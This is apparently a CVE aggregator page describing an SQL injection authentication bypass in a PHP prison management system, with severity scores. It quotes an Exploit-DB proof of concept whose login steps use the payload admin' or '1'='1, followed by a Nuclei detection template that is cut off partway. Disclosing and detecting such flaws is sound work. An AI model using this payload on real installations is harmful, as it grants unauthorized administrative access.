CVE-2024-33288
published 2026-05-08CVE-2024-33288: Prison Management System Using PHP v1.0 was discovered to contain a SQL injection vulnerability via the username on the Admin login page.
PriorityP351high7.3CVSS 3.1
AVNACLPRNUINSUCLILAL
EXPLOIT
EPSS
0.81%
52.3th percentile
Prison Management System Using PHP v1.0 was discovered to contain a SQL injection vulnerability via the username on the Admin login page.
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Prison Management System - SQL Injection Authentication Bypass
exploitdb·2024-05-13
CVE-2024-33288 Prison Management System - SQL Injection Authentication Bypass
Prison Management System - SQL Injection Authentication Bypass
---
# Exploit : Prison Management System Using PHP -SQL Injection Authentication Bypass
# Date: 15/03/2024
# Exploit Author: Sanjay Singh
# Vendor Homepage: https://www.sourcecodester.com
# Software Link:https://www.sourcecodester.com/sql/17287/prison-management-system.html
# Tested on: Windows ,XAMPP
# CVE : CVE-2024-33288
# Proof of Concept:
Step 1-Visit http://localhost/prison/
Step 2 - Click on Admin Dashboard button and redirect on login page.
Step 3– Enter username as admin' or '1'='1 and password as 123456
Step 4 – Click sing In and now you will be logged in as admin.
Nuclei
Prison Management System - SQL Injection Authentication Bypass
nuclei
CVE-2024-33288 Prison Management System - SQL Injection Authentication Bypass
Prison Management System - SQL Injection Authentication Bypass
Sql injection vulnerability was found on the login page in Prison Management System
Template:
id: CVE-2024-33288
info:
name: Prison Management System - SQL Injection Authentication Bypass
author: s4e-io
severity: high
description: |
Sql injection vulnerability was found on the login page in Prison Management System
impact: |
Attackers can bypass authentication via SQL injection to gain unauthorized administrative access to the Prison Management System.
remediation: |
Apply security patches for Prison Management System addressing SQL injection vulnerabilities.
reference:
- https://en.0day.today/exploit/39610
- https://www.sourcecodester.com/sql/17287/prison-management-system.html
classification:
cpe: cpe:2.3:a:prison_managem
2026-05-08
Published